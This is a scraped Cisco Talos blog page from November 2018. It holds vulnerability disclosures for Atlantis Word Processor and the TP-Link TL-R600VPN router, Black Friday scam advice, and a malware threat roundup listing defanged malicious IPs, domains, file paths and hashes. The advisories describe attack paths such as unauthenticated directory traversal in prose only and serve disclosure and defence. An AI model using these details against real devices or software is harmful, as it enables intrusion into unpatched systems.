2018-11-14 :
2018-11-06 :
2018-09-24 :
2018-09-15 :
2018-09-13 :

Domains in the MEA certificate (on

Beers with Talos EP42: To the Moon, Everyone!

Wed, 21/11/2018 - 18:19

Beers with Talos (BWT) Podcast Ep. #42 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #42 show notes: Recorded Nov. 16, 2018 —

Cyber moonshot, baby! It’s just like that time the US raced everyone to the moon, except completely different and in-no-way related! Do we need a “cyber moonshot”? Is the plan that was just released the way to get there? ...and holy crap if Craig didn’t actually prepare for this podcast with notes and everything.

We hope that you enjoy our rants over the Thanksgiving holiday break (for our American friends) or just at work like usual for the rest of you that don’t have a four day weekend ahead. We are genuinely grateful for you, listeners, as the entire reason that we get to keep doing this podcast. We enjoy having fun spreading the word on security and calling out excellence where we find it.
The timeline:The topics01:00 - Roundtable - Hi, Ellen. Enjoy your swag. Also, transition programs for vets we are supporting
12:26 - The Cyber Moonshot! That’s really all we talk about the whole hour. I know we mentioned other topics, but we just ranted way too long on the first topic.
1:00:19 - Closing thoughts and parting shotsThe linksCyber Moonshot draft report (public link)
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff).
Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
[email protected]

Vulnerability Spotlight: Multiple remote code execution vulnerabilities in Atlantis Word Processor

Tue, 20/11/2018 - 13:35

A member of Cisco Talos discovered these vulnerabilities.
Executive summaryToday, Cisco Talos is disclosing three remote code execution vulnerabilities in the Atlantis Word Processor. Atlantis Word Processor is a traditional word processor that provides a number of basic features for users, in line with what is in other similar types of software. This application is written in Delphi and keeps the majority of its capabilities in a single, relocatable binary. An attacker could exploit these vulnerabilities to corrupt the memory of the application, which can result in remote code execution under the context of the application.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Atlantis to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability detailsAtlantis Word Processor open document format NewAnsiString length remote code execution vulnerability (TALOS-2018-0711/CVE-2018-4038)

The word processor contains an exploitable arbitrary write vulnerability in the open document format parser while trying to null-terminate a string. A specially crafted document could allow an attacker to pass an untrusted value as a length to a constructor, which miscalculates a length and then uses it to calculate the position to write a null byte. This particular bug lies in the `NewAnsiString` function.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor Huffman table code length remote code execution vulnerability (TALOS-2018-0712/CVE-2018-4039)

Atlantis Word Processor contains an out-of-bounds write vulnerability in its PNG implementation. When opening a specially crafted document, which would need to be supplied by an attacker, the application fingerprints it in order to determine the correct file format parser. Eventually, an attacker could corrupt memory, which would allow them to execute arbitrary code in the context of the application. A user only needs to open the document to trigger this vulnerability.

For more information on this vulnerability, read the full advisory here.

Atlantis Word Processor rich text format uninitialized TAutoList remote code execution vulnerability (TALOS-2018-0713/CVE-2018-4040)

An exploitable uninitialized pointer vulnerability exists in the rich text format parser of Atlantis Word Procesor. A specially crafted document can cause certain RTF tokens to dereference an uninitialized pointer and then write to it. When opening up an RTF document, the application will first fingerprint it in order to determine the correct file format parser. Eventually, this would corrupt the memory of the application, allowing a user to execute code in the context of the application.

For more information on this vulnerability, read the full advisory here.

Versions testedTalos tested and confirmed that Atlantis Word Processor, version is affected by these vulnerabilities.

ConclusionAll three of these vulnerabilities are triggered by the user opening a malicious, specially crafted document. The easiest way to avoid these issues is for the user to ensure that they don’t open any documents from untrusted sources. The latest update from Atlantis will also cover these vulnerabilities, as will the Snort rules listed below.

CoverageThe following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or

Snort Rules: 48385, 48386, 48389 - 48392

What scams shoppers should look out for on Black Friday and Cyber Monday

Mon, 19/11/2018 - 18:28
Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.

Last year, consumers spent a record $6.59 billion during the annual online shopping day, an all-time record, according to Adobe Insights. Still, that doesn’t mean no one is rushing out the night of Thanksgiving to do their shopping. Shoppers still went out in droves on Black Friday last year — Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.

These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.

One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which utilized the “hailstorm” method. This means that the attacker registered many domains and use them to send hundreds of spam emails in a matter of minutes, only to never use those domains again. Since those domains have no history in detection software, they can easily blow by security systems and land in users’ inboxes. The Cisco Umbrella data for bags-black-friday is below.

Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.

Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.

Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.

There are also specific malware attacks that have tried to capitalize on these “holidays.” For example, Microsoft discovered a malware campaign in 2016 that disguised itself as a special deal from online retailer Amazon that downloaded the Locky ransomware onto victim’s machines. Locky is a ransomware that’s been spread for years, mainly through email campaigns. Once launched, the malware will encrypt users’ files and ask for a payment in order to return the files. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor here called “LockyDump” that can help you recover your files.)

With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:

  • Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as
  • Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.
  • Do not click on any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
  • Use complex passwords that are unique, per site. Attackers commonly reuse passwords as a way to compromise multiple accounts with the same username.
  • If a deal sounds too good to be true, it probably is.

Our customers can detect and block these kinds of threats, as well, through a variety of our products.



Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN

Mon, 19/11/2018 - 12:30

Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20. However, these can only be exploited with an authenticated session. The remote code execution is done under the context of HTTPD However, since the HTTPD process is running under root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service
An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure
An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution
An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution
An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, they also lack the generic operating systems protections that mitigate vulnerabilities like buffer overflows. Fortunately in the case of TL-R600VPN routers, the critical vulnerabilities that lead remote code execution need authentication. However, the code could be executed with root privileges.

The following Snort IDs have been released to detect these vulnerabilities:

Threat Roundup for Nov. 9 to Nov. 16

Fri, 16/11/2018 - 17:20

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 09 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center,, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

  • Win.Ransomware.Gandcrab-6748603-0
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB." It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
  • Win.Virus.Parite-6748128-0
    Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
  • Win.Malware.Dijo-6748031-0
    Win.Malware.DIJO, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
  • Win.Malware.Vobfus-6747720-0
    Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
  • Win.Downloader.Upatre-6746951-0
    Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
  • Win.Malware.Emotet-6745295-0
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.
Indicators of Compromise
Registry Keys
  • N/A
  • Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c
  • \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4
  • Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
  • 66[.]171[.]248[.]178
Domain Names contacted by malware. Does not indicate maliciousness
  • ipv4bot[.]whatismyipaddress[.]com
Files and or directories created
  • %AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5
  • %AppData%\Microsoft\umitoa.exe
  • %AppData%\Microsoft\hhbbvc.exe
  • \Win32Pipes.000006c8.00000045
  • \Win32Pipes.000006c8.00000047
  • \Win32Pipes.000006c8.00000049
File Hashes
  • 008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f
  • 00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14
  • 02edf037074ebd2445625737108f7337715a6af17ec161429fa0392894e479bd
  • 04196939eee8a21a4480a5e5bcf34f70b20f1dad9c3038bc632a415130ac47e8
  • 043f30bd958e54d6947631c10d70ddec772ababd8a3852ceb0e646e87d670a92
  • 051f4d57fc51e1491eb9121cb6ecdd036e140103f1afbc73fe9cef9a4fd67a84
  • 06cafb061ce341647e48d4113eb71bed76290d30d54ce6d98169fcfe8bbe83c5
  • 0799d33c49bceeeeb9c92077d448d5823ab8e71a04b71c6b8afa7f386fb5aa92
  • 08d56fc6c0622c2e931f04eb8c68a25fa431ac4833b1cbd7e44847d55f7f26e1
  • 09abf839c42200b000d3065d2cda41d858be415a521a5cb2b77b6e62503ae460
  • 0a48f61677791bca8d2553662ec6bce8acfdb3249cfcabac2802ba216ac54262
  • 0acc350e791e4201a7dd17e389ba8e03264343020432389d3e1b9d08874005af
  • 0b3e086550e4baaa05c69777d484b9b20773b01d5c6da124197eff423b798b04
  • 0dd771fecae00517f9297e21a42956d2ee113f6f0bc4d3ee277f887721efc19a
  • 0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71
  • 0f50d6433d2a79f30c2417fc434098d029eceedf3acd405901d3951208be2ae7
  • 10b5897f820d7ae3fe0194b8969c42c5c5de6cc658baf95699f8a781e18237ff
  • 130f32c65f3f2e67bdc228f125bc07c049f40fae04114b0de920e9fd0b00bccf
  • 13ab0a6dcd3cfd5136b54d11739169917df37a5681189baf92c4c6b0a2df0bc9
  • 13ccda5af78a1dea028d076418db880ab3734c745f068d2c4df5de4d4968b478
  • 14094b6a6ba1af401829963ce991e02c0eb9da885eb3837cec88f1559e2007c6
  • 166627c9ad4fb0acb0bec8e09e1d4ceedc3110e7cdbaa709322d0dbe41a2f70f
  • 17b78d2828794c9612cc87b09b7254c32c810134e5d06742058c55ec55ddb746
  • 19b4d752b0be5e81c835bd3b87f3c1124c208ba6adb2150f7b85a1b76222350f
  • 1ac89466a2668afd8d06d0f9345d48151dc2978b81985070bb23e30a767bd71c

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
  • Residented
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %AppData%\Wplugin.dll
  • %WinDir%\Wplugin.dll
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp
  • %LocalAppData%\Temp\neb2886.tmp
File Hashes
  • 00ad96301d29476dba58c071ef5bc4cf5eb265e9181a1d866bcacfe847199f64
  • 01edcc04020177e2f31b13d9f6a46db2e058028011151850b0802394ccda8d77
  • 05f816442e9d1d18a80233674af70d0ce6e17d10768d8f0e77973566b07aba8e
  • 0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074
  • 115995a5dc32df9da2f214cf9f4f81341daf7bc101c1b9346bead99428acb15e
  • 145c7866de76f33e571f19a1a40c2e12c900a6a1ad9bac30b46dcdc28be6feec
  • 14ac990a0affb831e4dccee45cff19e8a7c28dc5b93f731131ffa1c319e43823
  • 15c7b9a2c4688af296b57ac418f01347c8fbbd74ac5fbcae17c90f9bcdfb8e26
  • 16ee4360c7d1b78da48d06889177668120dfcaf62745bbc8c88d7864d28ba43d
  • 1817a467dba009e325a1c8bbaa5c274ec80856f8936321980fee86a0e33a34cd
  • 181dd25663e2628e56410e65b57677f5f3346866ccb737aa2eab8dd7376a11af
  • 1c8698e1bd9fa33f8f664a0a12e90db53e91e31414cd307c21575a5d039b0d32
  • 1eece81891ab4f4836931f8b1bc630e044d08ed659797dc19afc3bebd3b2b259
  • 1fa3b372ec521a5b57a52d8b6a5ec8de67f5d8f80e87835b67b4916d4e5dd415
  • 29f37223352f9584de101958ce00b41c3c66d9cfb15cc27d22a67df2c9dcd53e
  • 2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37
  • 300655178fabae5c65e48307fef7de67100b7d866b118f1ca0f0919de7e3a490
  • 35270fa68190eba46f59bba10c8dce3a03e55d8af7e8a33f9a330e077f63aeff
  • 39cb46a92889429d3dfc422381b46d04f9e69af0a088eec656845f184ed0b8f2
  • 3b6a4dbf9a923ac935f6f671b38de0ed83da428b74dea48efa180365a507e13f
  • 452ce18b59c1ab0cb4925435edf60edcfc5114cdea15056702e69c45af5763a2
  • 4e38b473973bce00cf5f60b545327db9c9e8b17225262e88d13299f6abf579f2
  • 51a323f3b47edc969017af5b31d364d4f23574471a52511970aaf54a8c34c382
  • 51bbe9d3ae4bd23f31fd90ddf0d8af295ca98773653a16c2bb5a950670352888
  • 525bc89d56339ce9423aae276228a8b879d7156ecadff7054a397a8d5178f5f0

Screenshots of DetectionAMP


Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 95[.]181[.]198[.]115
  • 192[.]162[.]244[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • resolver1[.]opendns[.]com
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • myip[.]opendns[.]com
  • www[.]bing[.]com
  • hq92lmdlcdnandwuq[.]com
  • cyanteread[.]com
  • tmencedfur[.]com
Files and or directories created
  • %LocalAppData%\Temp\RESB9BE.tmp
  • %LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP
  • %LocalAppData%\Temp\9DF6.bin
  • %LocalAppData%\Temp\CB8E.bin
  • %LocalAppData%\Temp\3F14.bi1
  • %LocalAppData%\Temp\RESBCAB.tmp
  • %LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP
  • %LocalAppData%\Temp\5mq30dkw.2sp.psm1
  • %LocalAppData%\Temp\jrz15mzo.uwv.ps1
  • %LocalAppData%\Temp\lajoenvy.0.cs
  • %LocalAppData%\Temp\lajoenvy.cmdline
  • %LocalAppData%\Temp\lajoenvy.dll
  • %LocalAppData%\Temp\lajoenvy.err
  • %LocalAppData%\Temp\lajoenvy.out
  • %LocalAppData%\Temp\lajoenvy.tmp
File Hashes
  • 0024d14e96fc79b1f7fd052945424e685843a48b1124f2b19b3a0b00570fb716
  • 004a4d3772f1253ed309ce48cdefb8358c7500b91b7fc1a548dd32af03f8178d
  • 00f9d43bdeb5c30acc9e5594c0ff1bd29b52efdcaa63bb8eba745342c165f856
  • 0169eb0d2386671d1929cf74456a32da1758d8c177b4dadbb5c1998768eee892
  • 016ef438660d7acbe94a229f0680b154bb963bc9dbc56eed7450dab36d486c01
  • 01aa3a5ab9590ff079a13d66f67d40b441ab171d2a6ead0df5453b2d3b55888d
  • 01e4c31f4836784dc4d297c4ba6e8f680216693735339022e11669960b929dcc
  • 020c8eff9905e60c6bba7ff500dd0097b0b3017cfa33712a74ff23062c539520
  • 0326d68f08fc899cd8bb7f1a9c1d7df50bc5b979e0f7d2532904a419ab1b7160
  • 033370dfd1d35bc66ed5abf0e6f6ff214c9e1e25196fef04679f18875b0b683c
  • 0383644a89640bbccf401520a918b54920f038e04ec0b0ae0d5aa53c45c08705
  • 03d315458bfc34d01d2e058b6aa772c7fcd294f3dbcd821f71249675da00d94e
  • 03df086184a6b1b146858ea3cef951dc9c3bf6148a26740a74e2384f5cc4a256
  • 03e17ccdc6dfa104759f6d08c38a1ee96fd9cb161600fb5446b61132e4d9bd3d
  • 04abd09ae808338d64a59fedb49dd5af79599cb9e990c2eab869d1afb25285a1
  • 04ef397e7e52f4c71553f5eb2d4bc1971d2eda8a54eafa5a23aae4700264688d
  • 05a5bbabbab5444214ce70c1190f41ccef8ef3dee786d1821d26a396d8a49eb5
  • 07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2
  • 0879b668fbfac129d1c21076fc5826d46323398a3bcd327e4012be584778a446
  • 095114cf4e2a81c44821a1ad9d4ea632e8cf17cf35a5cabc65813a29bcc41157
  • 0a088fe8df26a9a2cd4330224134e1ea0d249300cbce0eaf11fc6f70b75f21f1
  • 0ad6e9f9cd8e64c8ec265d258407f627fb1a872d13bd9cb577ad5e100633f492
  • 0b438e78bb3fe8bffc8f5f1453f318efe177c97d9e4f0ba7e26969a60671a67e
  • 0b4d5c0751ead190373484f7b4d8f0d7e5de5ade613b888712b92947fc173a6a
  • 0d1b953aa006b38c0140f3a2bacda47a28262d54d5676aeeaf432235e356a5bd

Screenshots of DetectionAMP



Indicators of Compromise
Registry Keys
    • Value Name: muehe
  • \BaseNamedObjects\A
  • A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • ns1[.]chopsuwey[.]org
  • ns1[.]chopsuwey[.]biz
  • ns1[.]chopsuwey[.]info
  • ns1[.]chopsuwey[.]com
  • ns1[.]chopsuwey[.]net
Files and or directories created
  • \??\E:\autorun.inf
  • \autorun.inf
  • \??\E:\System Volume Information.exe
  • \System Volume Information.exe
  • \$RECYCLE.BIN.exe
  • \??\E:\$RECYCLE.BIN.exe
  • \Secret.exe
  • \??\E:\Passwords.exe
  • \??\E:\Porn.exe
  • \??\E:\Secret.exe
  • \??\E:\Sexy.exe
  • \??\E:\x.mpeg
  • \Passwords.exe
  • \Porn.exe
  • \Sexy.exe
  • %SystemDrive%\Documents and Settings\Administrator\sauuyi.exe
  • %UserProfile%\muehe.exe
  • \??\E:\RCXFF.tmp
  • \??\E:\muehe.exe
  • \RCXFBD0.tmp
  • \RCXFF.tmp
  • \muehe.exe
File Hashes
  • 010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c
  • 01cdf16c052bd4d6e8f50d0447f0570b6e42727cbb3dcebed6e20766a0599854
  • 02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544
  • 0293926921291e6700eddb633fe22ac136735ace9170e6c502be52039d3e7488
  • 02f72dfcc27501cd1a44b3a0eed9e41831f745fc26d6b7d1526c151c94d58333
  • 0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2
  • 0581546a844cf13d0f0c494c9cda7eb7a71a5dbea4abbd8ddb917fe00665965b
  • 06383e4b2c2a596732f85ce8028c5b1c0a60c82e75bbb75358bcd8498b6b4b03
  • 080d08b5202a6da7052a3256c1863db41121881d75188ad96b9af9ab5932a97e
  • 08293e6522e8888ce18400e0c3d6e6ac1319e80bd99ffd24b8e7845fca091cf5
  • 08c0cc2e37a1fbc8f84c932a7cb2bc9a3d3f78a4ce086c1286cb3d335619f9ff
  • 0b2752012a9e104641af14d60987db12a41d39401ac46584b6e9125ed5d0c198
  • 0bcd28d3d84c7518df94abbb5a8153a345121d1d126fc9dc4624259de02a41ab
  • 0c45087137456380ec673b12d06310d8d753be92a3009bcec94ec4ebc2140bb7
  • 0ceecae1d802f19881b04e6f97af98b5039f2b8ccd538c293d66de93d8d77964
  • 0d9a84172a0f96b340eb3f6bd45ca30dbe6c20180f9dae75cb135d0d8b6ffa38
  • 0db0feea81c1b211fbae852151734fca8fb423102cb953dafb3c188f40491482
  • 0ea8e078ab8b42d97148b488fb1ad7d21972c37fdac7befc7d462ee7be3acb84
  • 0feb943bda713bb872c82a94bceb10acd11a1ec0cd2997236dc17da24b646288
  • 121a6b3a8000948f073e3660ecafb19bf5d204a9d468112575afd15c39222eb1
  • 12fc93e4e1c01ce7e3670138d50aa26e5c3d77f3c42da0dc3bd7bbae57359dc4
  • 133fea888e19e34c7703b38194ec08360ce8d697d7aec79da979a35072adce02
  • 145fe07226fb8eb92f609f16f7044ae5a529433730d285ca7c33b9cff6b86b71
  • 1551de875bb37b13c332d5b67ed64026c477f21bbcc6ad3d50ba8b3b8702ee5f
  • 18ee7ed2c61ee532f9a42d02c3c53b017496071608324361117514bdd3fdcade

Screenshots of DetectionAMP



Indicators of Compromise
Registry Keys
  • N/A
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]38[.]137[.]100
Domain Names contacted by malware. Does not indicate maliciousness
  • drippingstrawberry[.]com
Files and or directories created
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ffengh.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\hfsrfgs.exe
  • %LocalAppData%\Temp\ffengh.exe
  • hfsrfgs.exe
File Hashes
  • 1b806d44ead6688b22e623a1d50ad910af73b6ebe274901cccff8aabd526e3dd
  • 1df5a1477102ad9d32a976eea0af04b7c63a660fefc39a8c2c524e8cfa9634e3
  • 2e09c458bc34495f4390b2783d17369a2f809860eb95b95ff914c6610fd42ab0
  • 56db7b1dd0bcbeca631eee556146fb599fc363466f51ec01eae28ecd4289e838
  • 61e96310f388db546db48b6b8d81958264647add9f7cc880067cd6f875b5b4f9
  • 64c1bb68e91d30812c0ea2690a4bb15d2788b43ec6c54aa9672de758ee7e5042
  • 71dfc74d26d696f74b65c03c93a9118b9c62e5adfb6c93a5e15d00dcb50d585f
  • 7a305e442718a07f2ddcc7ae9a8983c49be3247c123b06dabcf7d48d3a4bdcde
  • 7da8dd2d31ad4ed61c87b5f44e1d70bcb938d9c5ff9abbc94c8e76cf0b10f379
  • 87071c84cff348e086cb28fcfeec54daf58d728c5fb3aaa26ff4aca42fab4b4f
  • 99230cc2ba171d71a9c5bade432d53bbf1ea78be629f62b90bb73fd71a26e8a4
  • af44d4fff8ce394f9ecb9b3f9d95b8fb440a7b8f1892574f41355072ec2f0999
  • bcdfdc97d2a6f3769902d3bf55b180b4dd9efc74af345cf23a795dbdc9456b51
  • c224d27d7adf2fece2e92d4ed2f62e244e8e5bcaa98c89ade06d40b0112e6bd1
  • d7afe736ed75987b854236b451a4cb6f0642b4e9cc92f3a9a96e2b8535070d05
  • d9d107fed85d142d6a5cb4d40a48b3ddf5c61f97bc502a297f816ac902fa13a6
  • e4eddc3910aca83db9bef4bc4f11006c0ae09a1552a6266adac79dc922ffe90a
  • e6c03bfb271c97063320d079b7ed156b8eae18c75ccf5c25d5ae5cc01df62139
  • f41388706c803a31645f416804995ad881d8ee0e0de0f0c355fb87fc415de211
  • fb75875cdf989e58a80330aa43543b9ab3765fde077174729e2011555cd295d9

Screenshots of DetectionAMP



Indicators of Compromise
Registry Keys
    • Value Name: ObjectName
  • Global\I98B68E3C
  • Global\M98B68E3C
  • PEM19C
  • PEM52C
  • PEM748
  • PEM43C
  • PEM20C
IP Addresses contacted by malware. Does not indicate maliciousness
  • 187[.]162[.]64[.]157
  • 98[.]144[.]2[.]113
  • 200[.]71[.]62[.]76
  • 82[.]211[.]30[.]202
  • 165[.]255[.]91[.]69
  • 154[.]0[.]171[.]246
  • 110[.]142[.]247[.]110
  • 119[.]59[.]124[.]163
  • 108[.]51[.]20[.]17
  • 197[.]249[.]165[.]27
  • 96[.]242[.]234[.]105
  • 217[.]91[.]43[.]150
  • 66[.]220[.]110[.]56
  • 72[.]67[.]198[.]45
  • 183[.]88[.]1[.]238
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • N/A
File Hashes
  • 0edecb893280c8258b5ee20f17afdbdcd09efdec198ba3f0b9dae3bb3a74c497
  • 11fb93e3b137ff6978fd79fdd634f44f257ee28f9bc5c2965108cb5c49a0d949
  • 313f19bdb8c46b96ac18bca55f53f5c0eb03d2fcececaab47b9339d8f014f7c7
  • 40651a1759d2ae614541d3f6e8bb6298ab72a242673c44e541dc28e30ca8929f
  • 5df55f78a21cd8457c9432afc8da45c182fad6107e3b6e4f5cf86272b68012b1
  • 70921b45506097595f7d11123c1b5c92aa032332c8a503058b27f32ec85d8df2
  • 73689ce1d669a63bdc781fab63f052fdc22021f7d08d37ed7573d2da7230568e
  • 83b316b9a9f76efcab1e741c8eeb7a0c7a50072c3fde5acd49cb0d28afbe7a23
  • 9edeb5b8ba0b6fd036650f80edf1cdd3c35974fcb8ef5a272b658d3ec1a38035
  • b53fb3cf4ed1d4e62dd0cc9d8e1d482dc1a55dedc3804a097f1b213080bb64c5
  • dab7877de92a3793873fec30c4b2e4a758bd5c3c6a67c8da20bfce7c255031be
  • ea8479d471d38105312f8264f2d93c7dd317d1bfda94f345f74313efffe8fb54
  • eba4704ea3e2a37a2bef98101758cbd2264bf6dcfe36eb930fe36fa32d75838a
  • f2a2d0eda6e21c4273d07aafe190918d96c21db335de4c4872e1eca136920c6b
  • fba4b9baf4b72790f1ff9ad58160efd7bd4a1927191668da75468255083e48b9
  • fc5935b12a8d07abcafc613a04d3c6773e088f31b88f78acc7f8ee2d2fc2d529

Screenshots of DetectionAMP


Beers with Talos Ep. #41: Sextortion, money and malware

Wed, 14/11/2018 - 14:38

